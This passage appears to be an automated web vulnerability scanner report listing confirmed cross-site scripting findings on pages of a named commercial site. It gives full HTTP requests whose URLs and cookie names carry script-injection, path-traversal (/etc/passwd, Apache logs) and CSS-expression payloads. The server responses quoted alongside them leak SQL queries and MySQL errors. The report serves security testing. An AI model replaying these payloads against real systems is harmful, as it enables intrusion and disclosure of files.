prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005AD)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/meac00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005AB)%3C/script%3E

/ppc/leadflow/meac00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005AB)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0005AB)</script>

Request

GET /ppc/leadflow/meac00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005AB)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/meac00/project.php?catId=30008&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9dptjbub0krssdt1q4j8865dr3; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/'"--></style></script><script>netsparker(0x0005AB)</script>' OR prj.project_page_url = 'leadflow/meac00/'"--></style></script><script>netsparker(0x0005AB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/'"--></style></script><script>netsparker(0x0005AB)</script>' OR prj.project_page_url = 'leadflow/meac00/'"--></style></script><script>netsparker(0x0005AB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/'"--></style></script><script>netsparker(0x0005AB)</script>' OR prj.project_page_url = 'leadflow/meac00/'"--></style></script><script>netsparker(0x0005AB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/'"--></style></script><script>netsparker(0x0005AB)</script>' OR prj.project_page_url = 'leadflow/meac00/'"--></style></script><script>netsparker(0x0005AB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/'"--></style></script><script>netsparker(0x0005AB)</script>' OR prj.project_page_url = 'leadflow/meac00/'"--></style></script><script>netsparker(0x0005AB)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005AB)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/phsy00/project.php

/ppc/leadflow/phsy00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/project.php?'"--></style></script><script>alert(0x000597..

Parameters

Parameter Type Value
catId GET 110009
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x000597)</script>

Request

GET /ppc/leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:13 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=jrklj2ve9rcrtavahr2pa1eps2; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?'"--></style></script><script>netsparker(0x000597)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000597)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/meac00/

/ppc/leadflow/meac00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/?'"--></style></script><script>alert(0x0005B0)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005B0)</script>

Request

GET /ppc/leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/meac00/project.php?catId=30008&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ltp9ablnu5olmjoi6encr9gq84; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


